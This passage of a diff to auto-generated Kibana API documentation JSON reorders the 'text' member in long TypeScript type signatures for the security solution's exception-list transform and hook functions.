\"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, @@ -118,7 +118,7 @@ "The exceptionItem to transform the output of" ], "signature": [ - "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" + "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, @@ -138,7 +138,7 @@ "label": "transformNewItemOutput", "description": [], "signature": [ - "(exceptionItem: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) => { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "(exceptionItem: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) => { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, @@ -151,7 +151,7 @@ "label": "exceptionItem", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, @@ -171,7 +171,7 @@ "\nTransforms the output of exception items to compensate for technical debt or UI concerns such as\nReactJS preferences for having ids within arrays if the data is not modeled that way.\n\nIf you add a new transform of the output called \"myNewTransform\" do it\nin the form of:\nflow(removeIdFromExceptionItemsEntries, myNewTransform)(exceptionItem)\n" ], "signature": [ - "(exceptionItem: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; })) => { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; })" + "(exceptionItem: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; })) => { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; })" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, @@ -186,7 +186,7 @@ "The exceptionItem to transform the output of" ], "signature": [ - "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; })" + "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; })" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, @@ -317,7 +317,7 @@ "OptionalSignalArgs", "<", "DeleteListParams", - ">], { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: string | undefined; tie_breaker_id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; updated_at: string; updated_by: string; version: number; }>" + ">], { _version: string | undefined; created_at: string; created_by: string; description: string; deserializer: string | undefined; id: string; immutable: boolean; meta: object | undefined; name: string; serializer: 